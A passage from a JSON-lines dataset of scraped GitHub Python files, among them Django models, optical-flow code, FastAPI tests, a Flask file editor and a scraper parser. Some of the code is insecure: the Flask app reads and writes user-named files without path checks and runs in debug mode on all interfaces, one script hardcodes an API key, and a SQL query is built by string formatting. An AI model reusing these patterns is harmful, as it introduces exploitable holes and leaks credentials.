cursor.fetchall()]\n\n # Sanitize the table_name before using it in the query\n table_name = sanitize_table_name(table_name)\n\n # Use 
string formatting to construct the query\n\n    query = f\"SELECT * FROM {table_name}\"\n    cursor.execute(query)\n    rows = cursor.fetchall()\n\n    # Create a list of dictionaries with column names as keys\n    data = []\n    for row in rows:\n        row_dict = {}\n        for i, value in enumerate(row):\n            row_dict[columns[i]] = value\n        data.append(row_dict)\n\n    # Close the connection to the SQLite database\n    conn.close()\n\n    return data\n","repo_name":"sebastienrousseau/pain001","sub_path":"pain001/db/load_db_data.py","file_name":"load_db_data.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"39"} +{"seq_id":"15605352733","text":"from django.db import models\nfrom user.models import User\n# Create your models here.\n\nclass Post(models.Model):\n    class Meta:\n        db_table = 'post'\n\n    id = models.AutoField(primary_key=True)\n    title = models.CharField(max_length=200,null=True)\n    postdate = models.DateTimeField(null=True)\n    # from a Post you can look up its author and, via the one-to-one below, its content\n    author = models.ForeignKey(User, on_delete=models.PROTECT) # declares the foreign key; migrate generates an author_id column\n    # self.content gives access to the Content instance; its text is self.content.content\n\n    def __repr__(self):\n        return \"<Post id={} title={} author={} content={}>\".format(\n            self.id,self.title,self.author,self.content)\n    __str__ = __repr__\n\nclass Content(models.Model):\n    class Meta:\n        db_table = 'content'\n    # without an explicit primary key an auto-increment one would be created\n    post = models.OneToOneField(Post,primary_key=True,on_delete=models.PROTECT) # one-to-one: this side gets a post_id foreign key referencing Post.id\n    content = models.TextField(null=False)\n    def __repr__(self):\n        return \"<Content post={} content={}>\".format(\n            self.pk,self.content[:20]\n        )\n\n    __str__ = __repr__","repo_name":"mghxy123/learnPython","sub_path":"web开发/django/blog/post/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41926348908","text":"import os\n\nimport numpy as np\nimport cv2 as cv\n\n\ndef load_FLO_file(filename):\n    assert os.path.isfile(filename), 'file does not exist: ' + filename\n    flo_file = open(filename, 'rb')\n    magic = np.fromfile(flo_file, np.float32, count=1)\n    assert magic == 202021.25, 'Magic number incorrect. 
.flo file is invalid'\n w = np.fromfile(flo_file, np.int32, count=1)\n h = np.fromfile(flo_file, np.int32, count=1)\n data = np.fromfile(flo_file, np.float32, count=2 * w[0] * h[0])\n flow = np.resize(data, (int(h[0]), int(w[0]), 2))\n flo_file.close()\n return flow\n\n\nclass OpticalFlow:\n def __init__(self):\n # Parameters for Lucas_Kanade_flow()\n self.EIGEN_THRESHOLD = 0.01 # use as threshold for determining if the optical flow is valid when performing Lucas-Kanade\n self.WINDOW_SIZE = [25, 25] # the number of points taken in the neighborhood of each pixel\n\n # Parameters for Horn_Schunck_flow()\n self.EPSILON = 0.002 # the stopping criterion for the difference when performing the Horn-Schuck algorithm\n self.MAX_ITERS = 1000 # maximum number of iterations allowed until convergence of the Horn-Schuck algorithm\n self.ALPHA = 1.0 # smoothness term\n\n # Parameter for flow_map_to_bgr()\n self.UNKNOWN_FLOW_THRESH = 1000\n\n self.prev = None\n self.next = None\n\n def next_frame(self, img):\n self.prev = self.next\n self.next = img\n\n if self.prev is None:\n return False\n\n frames = np.float32(np.array([self.prev, self.next]))\n frames /= 255.0\n\n # calculate image gradient\n self.Ix = cv.Sobel(frames[0], cv.CV_32F, 1, 0, 3)\n self.Iy = cv.Sobel(frames[0], cv.CV_32F, 0, 1, 3)\n self.It = frames[1] - frames[0]\n\n return True\n\n # ***********************************************************************************\n\n # implement Lucas-Kanade Optical Flow\n # returns the Optical flow based on the Lucas-Kanade algorithm and visualisation result\n def Lucas_Kanade_flow(self):\n image = self.prev\n w1 = self.WINDOW_SIZE[0] // 2\n w2 = self.WINDOW_SIZE[1] // 2\n flow = np.zeros((image.shape[0], image.shape[1], 2))\n for i in range(w1, image.shape[0] - w1):\n for j in range(w2, image.shape[1] - w2):\n ix = self.Ix[i - w1:i + w1 + 1, j - w2:j + w2 + 1].flatten()\n iy = self.Iy[i - w1:i + w1 + 1, j - w2:j + w2 + 1].flatten()\n it = self.It[i - w1:i + w1 + 1, j - w2:j + w2 + 1].flatten()\n A = np.vstack((ix, iy)).T\n M = A.T @ A\n if np.min(abs(np.linalg.eigvals(M))) >= self.EIGEN_THRESHOLD:\n b = np.reshape(it, (it.shape[0], 1))\n d = np.linalg.inv(M) @ A.T @ b\n flow[i, j, 0] = d[0]\n flow[i, j, 1] = d[1]\n\n flow_bgr = self.flow_map_to_bgr(flow)\n return flow, flow_bgr\n\n # ***********************************************************************************\n # implement Horn-Schunck Optical Flow \n # returns the Optical flow based on the Horn-Schunck algorithm and visualisation result\n def Horn_Schunck_flow(self):\n image = self.prev\n w1 = self.WINDOW_SIZE[0] // 2\n w2 = self.WINDOW_SIZE[1] // 2\n flow = np.zeros((image.shape[0], image.shape[1], 2))\n\n n_iterations = 0\n while True:\n flow_prev = flow.copy()\n\n u_bar = flow[:, :, 0] + cv.Laplacian(flow[:, :, 0], cv.CV_64F) / 4\n v_bar = flow[:, :, 1] + cv.Laplacian(flow[:, :, 1], cv.CV_64F) / 4\n\n flow[:, :, 0] = u_bar - self.Ix * (self.Ix * u_bar + self.Iy * v_bar + self.It) / \\\n (1 + self.Ix ** 2 + self.Iy ** 2)\n flow[:, :, 1] = v_bar - self.Iy * (self.Ix * u_bar + self.Iy * v_bar + self.It) / \\\n (1 + self.Ix ** 2 + self.Iy ** 2)\n\n # termination condition\n flow_difference = flow - flow_prev\n metric = np.abs(np.sum(flow_difference[:, :, 0])) + np.abs(np.sum(flow_difference[:, :, 1]))\n\n n_iterations += 1\n\n # metric is set to 2 instead of 0.002 to speed up the computation\n if metric < 2:\n break\n\n flow_bgr = self.flow_map_to_bgr(flow)\n return flow, flow_bgr\n\n # 
***********************************************************************************\n # calculate the angular error here\n # return average angular error and per point error map\n def calculate_angular_error(self, estimated_flow, groundtruth_flow):\n aae_per_point = np.zeros(self.prev.shape)\n for i in range(self.prev.shape[0]):\n for j in range(self.prev.shape[1]):\n aae_per_point[i, j] = np.arccos((groundtruth_flow[i, j, 0] * estimated_flow[i, j, 0] + groundtruth_flow[\n i, j, 1] * estimated_flow[i, j, 1] + 1) /\n np.sqrt((groundtruth_flow[i, j, 0] ** 2 + groundtruth_flow[\n i, j, 1] ** 2 + 1) * (estimated_flow[i, j, 0] ** 2 + estimated_flow[\n i, j, 1] ** 2 + 1)))\n aae = np.average(aae_per_point)\n return aae, aae_per_point\n\n # ***********************************************************************************\n # calculate the endpoint error here\n # return average endpoint error and per point error map\n def calculate_endpoint_error(self, estimated_flow, groundtruth_flow):\n aee_per_point = np.zeros(self.prev.shape)\n for i in range(self.prev.shape[0]):\n for j in range(self.prev.shape[1]):\n aee_per_point[i, j] = (groundtruth_flow[i, j, 0] - estimated_flow[i, j, 0]) ** 2 + (\n groundtruth_flow[i, j, 1] - estimated_flow[i, j, 1]) ** 2\n aee = np.average(aee_per_point)\n return aee, aee_per_point\n\n # ***********************************************************************************\n # function for converting flow map to to BGR image for visualisation\n # return bgr image\n def flow_map_to_bgr(self, flow):\n hsv = np.zeros([self.prev.shape[0], self.prev.shape[1], 3])\n hsv[..., 1] = 255\n\n mag, ang = cv.cartToPolar(flow[..., 0], flow[..., 1])\n hsv[..., 0] = ang * 180 / np.pi / 2\n hsv[..., 2] = cv.normalize(mag, None, 0, 255, cv.NORM_MINMAX)\n flow_bgr = cv.cvtColor(hsv.astype('uint8'), cv.COLOR_HSV2BGR)\n\n return flow_bgr\n\n\ndef visualize_flow(title, flow):\n cv.imshow(title, flow)\n cv.waitKey(0)\n cv.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n\n data_list = [\n 'data/frame_0001.png',\n 'data/frame_0002.png',\n 'data/frame_0007.png',\n ]\n\n gt_list = [\n './data/frame_0001.flo',\n './data/frame_0002.flo',\n './data/frame_0007.flo',\n ]\n\n Op = OpticalFlow()\n\n for (i, (frame_filename, gt_filemane)) in enumerate(zip(data_list, gt_list)):\n groundtruth_flow = load_FLO_file(gt_filemane)\n img = cv.cvtColor(cv.imread(frame_filename), cv.COLOR_BGR2GRAY)\n if not Op.next_frame(img):\n continue\n\n flow_lucas_kanade, flow_lucas_kanade_bgr = Op.Lucas_Kanade_flow()\n aae_lucas_kanade, aae_lucas_kanade_per_point = Op.calculate_angular_error(flow_lucas_kanade, groundtruth_flow)\n aee_lucas_kanade, aee_lucas_kanade_per_point = Op.calculate_endpoint_error(flow_lucas_kanade, groundtruth_flow)\n\n flow_horn_schunck, flow_horn_schunck_bgr = Op.Horn_Schunck_flow()\n aae_horn_schunk, aae_horn_schunk_per_point = Op.calculate_angular_error(flow_horn_schunck, groundtruth_flow)\n aee_horn_schunk, aee_horn_schunk_per_point = Op.calculate_endpoint_error(flow_horn_schunck, groundtruth_flow)\n\n flow_bgr_gt = Op.flow_map_to_bgr(groundtruth_flow)\n\n # Implement vizualization below \n # Your functions here\n\n visualize_flow('ground_truth', flow_bgr_gt)\n visualize_flow('lucas_kanade', flow_lucas_kanade_bgr)\n visualize_flow('horn_schunck', flow_horn_schunck_bgr)\n\n # Collect and display all the numerical results from all the runs in tabular form (the exact formating is up to your choice)\n print(f\"\"\"\n {\"*\" * 20}\n frame {i}\n \n Lukas_Kanade:\n average angular error: 
{aae_lucas_kanade}\n    average endpoint error: {aee_lucas_kanade}\n    \n    Horn-Schunck:\n    average angular error: {aae_horn_schunk}\n    average endpoint error: {aee_horn_schunk}\n    \n    \"\"\")\n","repo_name":"AlekseiZhuravlev/Assignments-MSc","sub_path":"2201_Computer_vision/09_OpticalFlow/sheet09.py","file_name":"sheet09.py","file_ext":"py","file_size_in_byte":8664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"30720285040","text":"# Build the structure of a Patricia trie to store the vowels\nclass no:\n    # Initialise the node's fields\n    def __init__(self,chave=None):\n        self.chave = chave\n        self.marcador = 0\n        self.filhos = {\n            'a': None,\n            'e': None,\n            'i': None,\n            'o': None,\n            'u': None\n        }\n\n    # Print the node's fields\n    def __str__(self): \n        return 'No('+str(self.chave)+')'\n\n    def inserir(self, palavra: str):\n        primeira_letra = palavra[0]\n        n = no(palavra)\n        self.filhos.update({primeira_letra : n})\n\n        return self.filhos[primeira_letra]\n\nraiz = no()\nlinha1 = raiz.inserir('al')\nlinha2 = linha1.inserir('egria')\nlinha3 = linha1.inserir('ugar')","repo_name":"PedroWC/exerciciosPython","sub_path":"ED/patricia/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"73893815793","text":"from fastapi import UploadFile, File\r\nfrom fastapi.testclient import TestClient\r\nimport os\r\nimport io\r\n\r\nfrom starlette.routing import BaseRoute\r\nfrom ..main import app\r\n\r\nfrom ..routers.problems import Answer, router\r\nfrom .util import replace_floats\r\n\r\n\"\"\"\r\ndef test_no_file(path: str):\r\n    with TestClient(app) as client:\r\n        response = client.post(path)\r\n        assert response.status_code == 422 \r\n        return\r\n\r\ndef test_empty_file(path: str):\r\n    with TestClient(app) as client:\r\n        file = io.StringIO(\"xyz\")\r\n        files = {\"file\": file}\r\n        response = client.post(path, files=files)\r\n        assert response.status_code == 500\r\n\"\"\"\r\ndef test_docs(path: str):\r\n    r = [r for r in app.routes if r.path == path]\r\n    route = r[0]\r\n    assert route is not None\r\n    assert hasattr(route, \"description\")\r\n    assert hasattr(route, \"path\")\r\n    if hasattr(route, \"description\") and hasattr(route, \"path\"):\r\n        description: str = route.description\r\n        splits = description.split(\"```\")\r\n        \r\n        if len(splits) <= 2:\r\n            print(f\"{path} not implemented\")\r\n            return\r\n        if len(splits) > 2:\r\n            dataset = splits[1].strip()\r\n            output = splits[3].strip()\r\n            file = io.StringIO(dataset)\r\n            files = { 'file': file }\r\n            with TestClient(app) as client:\r\n                response = client.post(path, files=files)\r\n                assert response.status_code == 200\r\n                json = response.json()\r\n                if \"answer\" not in json:\r\n                    assert json[\"error\"] == \"not implemented\"\r\n                    return\r\n                assert \"answer\" in json\r\n                if json[\"answer\"] == \"\":\r\n                    print(f\"{path} not implemented\")\r\n                    return\r\n                replaced = replace_floats(str(json['answer']))\r\n                r_output = replace_floats(output)\r\n                assert replaced == r_output\r\n\r\n\r\n\r\ndef test_datasets(file_prefix: str):\r\n    with TestClient(app) as client:\r\n        data_folder = os.path.join(os.path.dirname(__file__), \"data\")\r\n        f = os.path.join(data_folder, f\"rosalind_{file_prefix}_dataset.txt\")\r\n        out = os.path.join(data_folder, f\"rosalind_{file_prefix}_output.txt\")\r\n        name = file_prefix.split(\"_\")[0]\r\n        url = f\"/problems/{name.upper()}\"\r\n        with open(f, 'rb') as tmp:\r\n            files = {'file': 
tmp}\r\n            response = client.post(url, files=files)\r\n            assert response.status_code == 200\r\n            json = response.json()\r\n            if \"answer\" not in json:\r\n                assert json[\"error\"] == \"not implemented\"\r\n                return\r\n            assert \"answer\" in json\r\n            with open(out, \"r\") as out_file:\r\n                replaced = replace_floats(str(json[\"answer\"]))\r\n                replaced_output = replace_floats(out_file.read())\r\n                assert replaced == replaced_output\r\n","repo_name":"boonepeter/franklin-api","sub_path":"app/tests/test_endpoints.py","file_name":"test_endpoints.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"18835184535","text":"#!/home/jack/Desktop/FlaskAppArchitect_Flask_App_Creator/env/bin/python\nfrom flask import Flask, render_template, redirect, url_for, request, session\nimport logging\nfrom logging.handlers import RotatingFileHandler\nimport os\nimport datetime\nimport random\n\napp = Flask(__name__)\napp.secret_key = os.urandom(24)\n\n# Create a logger object\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n# Create a formatter for the log messages\nformatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n\n# Create a file handler to write log messages to a file\nfile_handler = RotatingFileHandler('Logs/CANVAS.log', maxBytes=10000, backupCount=1)\nfile_handler.setLevel(logging.DEBUG)\nfile_handler.setFormatter(formatter)\n\n# Add the file handler to the logger\nlogger.addHandler(file_handler)\n\n# Define paths and directories\ncanvas_dir = 'static/canvas'\noriginal_canvas_dir = os.path.join(canvas_dir, 'original')\nos.makedirs(original_canvas_dir, exist_ok=True)\n@app.route('/hello_world')\ndef hello_world():\n    TExt = \"TEXT TEST 6789\"\n    logger.debug('This is a debug message: %s', TExt)\n\n    TEXT = \"TEXT TEST abcd\"\n    logger.debug('This is a debug message: %s', TEXT)\n\n    return \"Hello, World!\"\n\ndef findvideos():\n    videoroot_directory = \"static\"\n    MP4 = []\n    for dirpath, dirnames, filenames in os.walk(videoroot_directory):\n        for filename in filenames:\n            if filename.endswith(\".mp4\") and \"Final\" in filename:\n                MP4.append(os.path.join(dirpath, filename))\n    if MP4:\n        last_video = session.get(\"last_video\")\n        new_video = random.choice([video for video in MP4 if video != last_video])\n        session[\"last_video\"] = new_video\n        return new_video\n    else:\n        return None\n\n\n\n# Function to load the original canvas file\ndef load_original_canvas_file(filename):\n    original_file_path = os.path.join(canvas_dir, filename)\n    with open(original_file_path, 'r') as file:\n        logger.debug(\"original_file_path: %s\", original_file_path)\n        return file.read()\n\n# Function to save the original canvas file with a timestamp\ndef save_original_canvas_file(filename, content):\n    now = datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n    new_filename = f\"{filename}_{now}canvas.js\"\n    new_file_path = os.path.join(original_canvas_dir, new_filename)\n    with open(new_file_path, 'w') as file:\n        file.write(content)\n\n# Function to edit and save the canvas file\ndef edit_and_save_canvas_file(filename, content):\n    save_original_canvas_file(filename, content)\n    logger.debug(\"filename: %s\", filename)\n    logger.debug(\"content: %s\", content)\n    edited_file_path = os.path.join(canvas_dir, filename)\n    with open(edited_file_path, 'w') as file:\n        file.write(content)\n\n@app.route('/')\ndef index():\n    return redirect(url_for('edit_canvas'))\n\n@app.route('/edit_canvas')\ndef edit_canvas():\n    filenames = [f for f in os.listdir(canvas_dir) if f.endswith('canvas.js')]\n    filenames = sorted(filenames)\n    logger.debug(\"FILENAMES: %s\", filenames)\n    fvideo = findvideos() # Assuming findvideos() is defined elsewhere\n    logger.debug(\"FVIDEO: %s\", fvideo)\n    return render_template('edit_canvas.html', filenames=filenames, video=fvideo)\n\n@app.route('/edit_canvas_page')\ndef edit_canvas_page():\n    selected_filename = request.args.get('filename')\n    logger.debug(\"selected_filename: %s\", selected_filename)\n    original_content = load_original_canvas_file(selected_filename)\n    logger.debug(\"original_content: %s\", original_content)\n    return render_template('edit_canvas_page.html', selected_filename=selected_filename, original_content=original_content)\n\n@app.route('/edit_canvas_save', methods=['POST'])\ndef edit_canvas_save():\n    edited_content = request.form['edited_content']\n    selected_filename = request.form['filename']\n    edit_and_save_canvas_file(selected_filename, edited_content)\n    return redirect(url_for('edit_canvas'))\n\nif __name__ == '__main__':\n    app.run(debug=True, host='0.0.0.0', port=5400)\n","repo_name":"JupyterJones/FlaskAppArchitect_Flask_App_Creator","sub_path":"JAVA.py","file_name":"JAVA.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"3424376372","text":"from celery_progress.backend import ProgressRecorder\nfrom django_mock_queries.query import MockSet\nfrom django.test import TestCase\nfrom mock import patch\n\nfrom twitter.models import User, Tweet, Query\nfrom twitter.register import UserRegister, TweetRegister\nfrom twitter.tasks import get_tweets_response, register_tweets\nfrom twitter.twitter import TweetLookup, UserLookup\n\n\nclass TestWordpressTasks(TestCase):\n    user_object = [\n        User(\n            id=100,\n            name='name',\n            username='username',\n            created_at='01/01/2021',\n            profile_image_url='profile_image_url',\n            protected=True,\n            public_metrics='public_metrics',\n            verified=True,\n            description='description',\n            location='location',\n            url='url'\n        )\n    ]\n    tweet_object = [\n        Tweet(\n            id=100,\n            text='texto de prueba',\n            author=user_object[0],\n            conversation_id=300,\n            created_at='01/01/2021',\n            lang='es'\n        )\n    ]\n    qs_tweet_mock = MockSet(tweet_object[0])\n    query_object = [\n        Query(\n            id=100,\n            text=\"query\"\n        )\n    ]\n    qs_query_mock = MockSet(query_object[0])\n    expected_tweets = {\n        'created_at': '2021-06-23T10:10:48.000Z', 'id': '1407642286956056579',\n        'conversation_id': '1407642286956056579',\n        'text': \"RT @DaysForGirls: How does #menstrualequity relate to #selfcare? 
Join DfG, @washunited & \"\n \"@MietAfrica next week as we kick off this year's S…\",\n 'lang': 'en', 'author_id': '1398144816223948803'\n }\n\n expected_user = {\n 'id': 100,\n 'name': 'name',\n 'username': 'username',\n 'created_at': '01/01/2021',\n 'profile_image_url': 'profile_image_url',\n 'protected': True,\n 'public_metrics': 'public_metrics',\n 'verified': True,\n 'description': 'description',\n 'location': 'location',\n 'url': 'url'\n }\n\n @patch.object(TweetLookup, 'search_tweets', return_value=expected_tweets)\n @patch.object(ProgressRecorder, 'set_progress')\n def test_get_tweets_response(self, get_post_types, progress):\n tweets = get_tweets_response('texto')\n\n assert tweets == self.expected_tweets\n\n @patch.object(Tweet.objects, 'find_by_id', return_value=MockSet())\n @patch.object(User.objects, 'find_by_id', return_value=MockSet())\n @patch.object(UserLookup, 'search_user', return_value=expected_user)\n @patch.object(UserRegister, 'execute', return_value=user_object[0])\n @patch.object(TweetRegister, 'execute', return_value=tweet_object[0])\n @patch.object(Tweet.objects, 'find_by_id', return_value=qs_tweet_mock)\n @patch.object(MockSet, 'get')\n @patch.object(User.objects, 'add_tweet')\n @patch.object(Query.objects, 'find_by_text', return_value=qs_query_mock)\n @patch.object(Query.objects, 'add_tweet')\n @patch.object(ProgressRecorder, 'set_progress')\n def test_register_tweets_with_new_user(self, progress, ufind, usearch, uexecute, texecute, tfinf2, tget,\n uadd, qfind, qadd, tfind):\n register_tweets([self.expected_tweets], 'texto')\n\n assert ufind.called\n assert usearch.called\n assert uexecute.called\n assert texecute.called\n","repo_name":"jaigor/fakenews_extractor","sub_path":"twitter/tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32777971010","text":"import requests\nfrom save_file import save_to_database\nimport sys\nimport os\nimport django\n\n# Добавьте путь к вашему Django проекту в список путей Python\nsys.path.append('/home/ubunto/Desktop/SAL/mysite')\n\n# Устанавливаем переменную окружения DJANGO_SETTINGS_MODULE на ваш файл settings.py\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mysite.settings')\ndjango.setup()\n\napi_key = '9311adde05f18107c8ddaf5f88f72024c1c50a6cd2497dcd4823200c00e5f5e4'\nurl = 'https://opendata.mkrf.ru/v2/cinema/75?l=1000'\n\nheaders = {\n 'Accept': 'application/json',\n 'X-API-KEY': api_key,\n}\n\ntry:\n response = requests.get(url, headers=headers)\n\n if response.status_code == 200:\n data = response.json()\n i = 0\n\n for item in data.get('data', []):\n item_id = item.get('data', {}).get('general', {}).get('id')\n item_name = item.get('data', {}).get('general', {}).get('name')\n item_locale = item.get('data', {}).get('general', {}).get('locale', {}).get('name')\n item_website = item.get('data', {}).get('general', {}).get('contacts', {}).get('website')\n item_email = item.get('data', {}).get('general', {}).get('contacts', {}).get('email')\n\n save_to_database(item_id, item_name, item_locale, item_website, item_email)\n print(f'ID: {item_id}, Name: {item_name}, Locale: {item_locale}, Website: {item_website}, Email: {item_email},')\n i+=1\n print('qewrqwer =', i)\n else:\n print(f'Ошибка при выполнении запроса: {response.status_code}')\nexcept Exception as e:\n print(f'Произошла ошибка: 
{str(e)}')","repo_name":"Rusy13/Parser_API","sub_path":"mysite/scripts/data_from_api.py","file_name":"data_from_api.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5396843088","text":"import os \nimport json \nimport read\nimport time\nimport boto3 \n\ndef cleanOutDir(dir,targetDir,ip):\n #print(\"cleanOut: cleaning \"+dir+\"... \") \n for item in os.scandir(dir): \n if item.path.endswith(\".json\") & item.is_file():\n tmpContent = read.getSingleFileContent(item.path)\n if tmpContent[\"Stats\"][\"PacketLossPercent\"] != \"0\":\n #print(\"found invalid ping data in \"+item.name) \n isExist = os.path.exists(targetDir)\n if not isExist: \n os.makedirs(targetDir)\n f = open(targetDir+\"/\"+item.name,\"w\")\n json.dump(tmpContent,f)\n f.close() \n #print(\"renaming \"+item.path)\n os.rename(item.path,item.path+\".bak\")\n elif item.path.endswith(\".bak\"):\n os.remove(item.path)\n\ndef filter(p,pt,ip,ds):\n while True:\n retString = \"\"\n #print(\"Filter: filtering \"+ip+\" from \"+p+\"to \"+pt+\", from folders older than \"+str(ds)+\" seconds\")\n ipDir = p+'/'+ip\n ipTargetDir = pt+'/'+ip\n print(\"Filter: iterate into \"+ipDir)\n currentTime = int(time.time())\n threshold = currentTime - ds\n for subDir in os.scandir(ipDir):\n if subDir.is_dir() & subDir.name.isnumeric():\n #print(\"taversing into \"+subDir.name+\"... \")\n if int(subDir.name) < threshold: \n if len(os.listdir(ipDir+\"/\"+subDir.name)) == 0:\n os.rmdir(ipDir+\"/\"+subDir.name)\n else: \n cleanOutDir(ipDir+\"/\"+subDir.name,ipTargetDir+\"/\"+subDir.name,ip)\n else: \n print(subDir.name + \" is not a valid directory, skipping.\") \n time.sleep(600) \n return retString\n\n","repo_name":"ThomasReulen/pinger","sub_path":"frontend/src/filesorter.py","file_name":"filesorter.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11021240186","text":"import collections\n\nclass DependenciesProcessor:\n wants = {\"product\"}\n\n def __init__(self, db):\n self.db = db\n self.dependency_map = collections.defaultdict(list)\n\n async def prepare(self):\n pass\n\n async def process(self, data):\n prod = data.product\n if prod is None:\n return\n win_builds = [\n build for build in prod.builds\n if build.os == \"windows\" and build.generation == 2\n ]\n if win_builds:\n latest_build = win_builds[-1]\n repo = await self.db.repository.load(prod.id, latest_build.id)\n if repo is None:\n return\n for dependency in repo.get(\"dependencies\", []):\n self.dependency_map[dependency].append({\"id\": prod.id, \"title\": prod.title})\n\n async def finish(self):\n for game_list in self.dependency_map.values():\n game_list.sort(key=lambda x: x[\"id\"])\n await self.db.dependencies.save(self.dependency_map)\n","repo_name":"Yepoleb/gogdb","sub_path":"gogdb/updater/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"39"} +{"seq_id":"35078558539","text":"import os\n\nimport pandas as pd\n\nimport pricing.data.answers_conversions_dictionaries as acd\n\nRAWDATADIRPATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'raw_data')\nPREPROCDATADIRPATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'preprocessed_data')\n\n\nclass DataPreprocesser:\n\n def __init__(self, path=None, 
no_basic_preprocessing=False, columns_to_remove=None):\n rawdata = pd.read_csv(os.path.join(RAWDATADIRPATH, 'rawdata.csv') if path is None else path)\n\n if not no_basic_preprocessing:\n # remove useless columns\n if columns_to_remove is not None:\n rawdata.drop(rawdata.columns[columns_to_remove], axis=1, inplace=True)\n\n # unify columns\n convs = acd.anwswers_translations()\n for c in convs:\n rawdata = rawdata.replace(to_replace=c[0], value=c[1])\n col2col = acd.question_to_question()\n nans = rawdata.isna()\n for c2c in col2col:\n for i in range(rawdata.shape[0]):\n if nans[c2c[1]][i]:\n rawdata.set_value(index=i, col=c2c[1], value=rawdata[c2c[0]][i])\n for c2c in col2col:\n rawdata = rawdata.drop(labels=[c2c[0]], axis=1)\n\n # simplify column names\n for column in rawdata:\n rawdata.rename(columns={column: col2col[next(i for i, lst in enumerate(col2col) if column in lst)][2]},\n inplace=True)\n\n # fix categorical data\n for c in convs:\n # more readable names\n rawdata = rawdata.replace(to_replace=c[1], value=c[2])\n\n rawdata.replace(('Yes', 'No'), (1, 0), inplace=True)\n\n for column in self.__get_categorical_columns(rawdata):\n dummies = pd.get_dummies(rawdata[column], prefix=column)\n rawdata.drop(column, axis=1, inplace=True)\n rawdata = pd.concat([rawdata, dummies], axis=1)\n\n self.data = rawdata\n\n def get_processed_data(self):\n return self.data\n\n def process_data(self, function_headers_list):\n for foo in function_headers_list:\n self.data = foo(self.data)\n\n def save_data(self, path=None):\n self.data.to_csv(os.path.join(PREPROCDATADIRPATH, 'processed_data.csv') if path is None else path, index=False)\n\n def __get_categorical_columns(self, dataframe):\n cols = dataframe.columns\n num_cols = dataframe._get_numeric_data().columns\n return list(set(cols) - set(num_cols))\n\n\nif __name__ == '__main__':\n # dp = DataPreprocesser(columns_to_remove=[0, 1])\n # dp.save_data()\n print(DataPreprocesser(path='./preprocessed_data/processed_data.csv', no_basic_preprocessing=True).data)\n","repo_name":"MatteoBiasielli/PricingInECommerce","sub_path":"pricing/data/DataPreprocesser.py","file_name":"DataPreprocesser.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"9380343034","text":"# -*- coding: utf-8 -*-\nimport re\nimport json\nfrom bs4 import BeautifulSoup\n\n\nclass Parser:\n def get(self, response):\n movie = {\n 'group': {},\n 'episode': [],\n 'links': [],\n }\n\n soup = BeautifulSoup(response, \"html.parser\")\n servers = soup.select('div#halim-list-server > div.halim-server')\n\n for server in servers:\n server_name = server.select_one('> span.halim-server-name').getText().strip().encode('utf-8')\n if server_name not in movie['group']: movie['group'][server_name] = []\n for ep in server.select('ul.halim-list-eps > li'):\n if ep.select_one('a'):\n ep = ep.select_one('a > span')\n else:\n ep = ep.select_one('span')\n\n movie['group'][server_name].append({\n 'link': \"{},{},{}\".format(ep.get('data-episode-slug'),\n ep.get('data-server'),\n ep.get('data-post-id')),\n 'title': ep.get('data-episode-slug').encode('utf-8')\n })\n\n return movie\n\n def get_link(self, response):\n movie = {\n 'group': {},\n 'episode': [],\n 'links': [],\n }\n\n sources = json.loads(response).get('data').get('sources')\n # print(sources.encode('utf8'))\n\n js_sources = re.search(r'sources:\\s(\\[.*?\\])', sources).group(1)\n if js_sources and 'not-a-real-video-file' not in js_sources:\n 
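# The captured group is itself a JSON array of {file, label, type} objects (see the .get calls below), so it can be handed straight to json.loads.\n            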
js_sources = json.loads(js_sources)\n for s in js_sources:\n movie['links'].append({\n 'link': s.get('file'),\n 'title': 'Link {}'.format(s.get('label')),\n 'type': s.get('type'),\n 'resolve': False,\n 'originUrl': 'http://fimfast.tv',\n })\n\n source = re.search(r\"=0 and i < len(shortestpaths) and not visited[i][startj]:\n dist = rev*(ord(map[i][startj])-ord(map[starti][startj]))\n if dist<=1:\n # ways.append((i,startj))\n path = shortestpaths[starti][startj]+1\n currentpath = shortestpaths[i][startj]\n if path=0 and j < len(shortestpaths[0]) and not visited[starti][j]:\n dist = rev*(ord(map[starti][j])-ord(map[starti][startj]))\n if dist<=1:\n # ways.append((starti,j)) \n path = shortestpaths[starti][startj]+1\n currentpath = shortestpaths[starti][j]\n if path0:\n if max is not None and shortestpaths[unvisited[0][0]][unvisited[0][1]]>max:\n # if current shortest is larger than max, no shorter paths available\n return 1e300,shortestpaths\n shortestpaths,visited=find_ways(*unvisited[0],shortestpaths,visited)\n unvisited = get_unvisited(visited,shortestpaths)\n \n return shortestpaths[target[0]][target[1]],shortestpaths\n\ndef 